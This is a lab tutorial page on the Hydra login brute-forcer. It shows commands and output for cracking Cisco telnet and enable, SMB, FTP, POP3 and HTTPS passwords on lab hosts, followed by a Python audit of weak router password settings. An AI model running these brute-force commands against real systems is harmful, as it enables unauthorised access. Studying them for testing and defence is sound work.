Hydra
From FlyByWire Docs
Overview

In cryptanalysis, a brute force attack is a method of defeating a cryptographic scheme by trying a large number of possibilities; for example, exhaustively working through all possible keys in order to decrypt a message. In most schemes, the theoretical possibility of a brute force attack is recognised, but the scheme is set up in such a way that the attack would be computationally infeasible to carry out.

Description

Hydra is a parallelized login hacker. It supports bruteforce of Samba, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more. It includes SSL support and is part of Nessus. If you’ve been considering installing Linux, this would be a good time.

Prerequisites

Passwords are among the biggest security holes, as every password security study shows. This tool is proof-of-concept code that gives researchers and security consultants a way to show how easy it would be to gain unauthorized remote access to a system. THC-Hydra is the world's first parallel login hacker. With this tool, you are able to attack several services at once (FTP, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS). Socks5 and SSL support are also included.

The application

    bash-2.05b# ./hydra
    Hydra v2.2 (c) 2002 by van Hauser / THC <vh@reptile.rug.ac.be>

    Syntax: ./hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-o FILE] [-t TASKS] [-g TASKS] [-w TIME] [-f] [-e ns] [-s PORT] [-S] server service [OPT]

    Options:
      -S        connect via SSL
      -s PORT   if the service is on a different default port, define it here
      -l LOGIN  or -L FILE login with LOGIN name, or load several logins from FILE
      -p PASS   or -P FILE try password PASS, or load several passwords from FILE
      -e ns     additional checks, "n" for null password, "s" try login as pass
      -C FILE   colon seperated "login:pass" format, instead of -L/-P option
      -o FILE   write found login/password pairs to FILE instead of stdout
      -f        exit after the first found login/password pair
      -t TASKS  run TASKS number of connects in parallel (default: 4)
      -g TASKS  start TASKS number per second until -t TASKS are reached
      -w TIME   in seconds, defines the max wait reply time (default: 30)
      server    the target server
      service   the service to crack. Supported protocols: [telnet ftp pop3 imap
                http https smb cisco cisco-enable ldap nntp vnc rexec socks5 icq
                pcnfs]
      OPT       some service modules need additional input, put it here
    Hydra is a tool to guess valid login/password pairs on a target server.
    You can always find the newest version at http://www.thehackerschoice.com
    Use this tool only for legal purposes!
    bash-2.05b#

Cisco Router / Switch Bruteforce

NOTE: I have created a small password file called pass.txt in my Hydra binary directory. Replace this with your favourite password list.

We'll start with an NMAP fingerprinting of the router:

Command line: nmap -O 192.168.1.229

    bash-2.05b# nmap -O 192.168.1.229

    Starting nmap 3.30 ( http://www.insecure.org/nmap/ ) at 2003-10-05 14:48 IST
    Interesting ports on 192.168.1.229:
    (The 1641 ports scanned but not shown below are in state: closed)
    Port       State       Service
    23/tcp     open        telnet
    79/tcp     open        finger
    80/tcp     open        http
    Device type: router
    Running: Cisco IOS 11.X|21.X
    OS details: Cisco IOS 11.3 - 12.0(11), Cisco IOS v11.14(CA)/12.0.2aT1/v12.0.3T

    Nmap run completed -- 1 IP address (1 host up) scanned in 5.141 seconds
    bash-2.05b#

We've identified a running Telnet service. Let’s use hydra to bruteforce the telnet password.

Command line: ./hydra -P pass.txt 192.168.1.229 cisco

    bash-2.05b# ./hydra -P pass.txt 192.168.1.229 cisco
    Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.
    Hydra is starting! [parallel tasks: 4, login tries: 13 (l:1/p:13)]
    [23][cisco] login: password: cloud
    Hydra finished.
    bash-2.05b#

Once we have a Telnet login (vty), we can try to bruteforce the enable password of the router:

Command line: ./hydra -m cloud -P pass.txt 192.168.1.229 cisco-enable

    bash-2.05b# ./hydra -m cloud -P pass.txt 192.168.1.229 cisco-enable
    Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.
    Hydra is starting! [parallel tasks: 4, login tries: 13 (l:1/p:13)]
    [23][cisco-enable] login: password: doggy
    Hydra finished.
    bash-2.05b#

So now we can telnet to the router with full access:

Command line: telnet 192.168.1.229

    bash-2.05b# telnet 192.168.1.229
    Trying 192.168.1.229...
    Connected to 192.168.1.229.
    Escape character is '^]'.

    User Access Verification

    Password: (cloud)
    Switch>en
    Password: (doggy)
    Switch#sh ru
    Building configuration...

    Current configuration:
    !
    version 12.0
    no service pad
    service timestamps debug uptime
    service timestamps log uptime
    no service password-encryption
    !
    hostname Switch
    !
    enable secret 5 $1$y19Y$GPYusTVCWnJs9PUkraoV90
    enable password cloud
    !
    !
    ip subnet-zero
    !
    !
    --More--

SMB Password Bruteforce

Command line: ./hydra -l administrator -P pass.txt 192.168.0.141 smb

    bash-2.05b# ./hydra -l administrator -P pass.txt 192.168.0.141 smb
    Reduced number of tasks to 1 (smb does not like parallel connections)
    Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.
    Hydra is starting! [parallel tasks: 1, login tries: 13 (l:1/p:13)]
    [139][smb] login: administrator password: lab
    All childrens are dead.
    bash-2.05b#

FTP Password Bruteforce

Command line: ./hydra -l administrator -P pass.txt 192.168.0.110 ftp

    bash-2.05b# ./hydra -l administrator -P pass.txt 192.168.0.110 ftp
    Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.
    Hydra is starting! [parallel tasks: 4, login tries: 14 (l:1/p:14)]
    [21][ftp] login: administrator password: mypassword
    Hydra finished.
    bash-2.05b#

POP3 Password Bruteforce

Command line: ./hydra -l muts -P pass.txt my.pop3.mail pop3

    bash-2.05b# ./hydra -l muts -P pass.txt my.pop3.mail pop3
    Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.
    Hydra is starting! [parallel tasks: 4, login tries: 19 (l:1/p:19)]
    [110][pop3] login: muts password: mypassword
    Hydra finished.
    bash-2.05b#

.htpasswd over SSL Password Bruteforce:

Command line: ./hydra -m /index.php -l muts -P pass.txt 192.168.0.12 https

    bash-2.05b# ./hydra -m /index.php -l muts -P pass.txt 192.168.0.12 https
    Hydra v2.2 (c) 2002 by van Hauser / THC - use allowed only for legal purposes.
    Hydra is starting! [parallel tasks: 4, login tries: 17 (l:1/p:17)]
    [443][www] login: muts password: password
    All childrens are dead.
    bash-2.05b#

HydraGTK

Target selection:
Source: http://www.hackingdefined.com/index.php/Labs:Hydra#Cisco_Router_.2F_Switch_Bruteforce
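The router configuration shown in the Cisco section explains why a 13-entry password list was enough. As an added example (not part of the original page and not Hydra code), the following Python audit flags the settings that leave an IOS device open to online password guessing. The finding names and both sample configurations are constructed, the `line vty` stanza is an assumption because the page's dump stops at `--More--`, and `login block-for` requires a later IOS release than the 12.0 image shown.

```python
import re

# Both configs are constructed. WEAK's global lines mirror the truncated "sh ru"
# dump above; hashes are placeholders and the "line vty" stanza is assumed,
# because the page's dump stops at --More-- before the line configuration.
WEAK = """\
no service password-encryption
enable secret 5 $1$PLACEHOLDER$PLACEHOLDER
enable password cloud
line vty 0 4
 password cloud
 login
"""
HARDENED = """\
service password-encryption
enable secret 5 $1$PLACEHOLDER$PLACEHOLDER
username admin secret 5 $1$PLACEHOLDER$PLACEHOLDER
login block-for 120 attempts 3 within 60
line vty 0 4
 login local
 transport input ssh
"""

def cleartext(lines, keyword):  # values of '<keyword> [0] VALUE' lines
    pat = re.compile(re.escape(keyword) + r" (?:0 )?(\S+)")
    return {m.group(1) for l in lines if (m := pat.fullmatch(l))}

def audit_ios_config(text):  # returns sorted finding IDs
    stanzas = []
    for raw in text.splitlines():
        if raw.startswith(" ") and stanzas:
            stanzas[-1].append(raw.strip())   # sub-command of the current stanza
        elif raw.strip():
            stanzas.append([raw.strip()])     # every top-level line opens a stanza
    top = [s[0] for s in stanzas]
    found = set()
    if "no service password-encryption" in top:
        found.add("cleartext-passwords-in-config")
    if any(l.startswith("enable password ") for l in top):
        found.add("legacy-enable-password")
    if not any(l.startswith("login block-for ") for l in top):
        found.add("no-login-rate-limit")
    for vty in (s for s in stanzas if s[0].startswith("line vty")):
        if "login" in vty and "login local" not in vty:
            found.add("vty-shared-password-no-username")
        if "transport input ssh" not in vty:
            found.add("vty-not-restricted-to-ssh")
        if cleartext(top, "enable password") & cleartext(vty, "password"):
            found.add("vty-password-reused-for-enable")
    return sorted(found)
```

Each vty stanza is checked separately, so a hardened `line vty 0 4` does not hide a weak `line vty 5 15`.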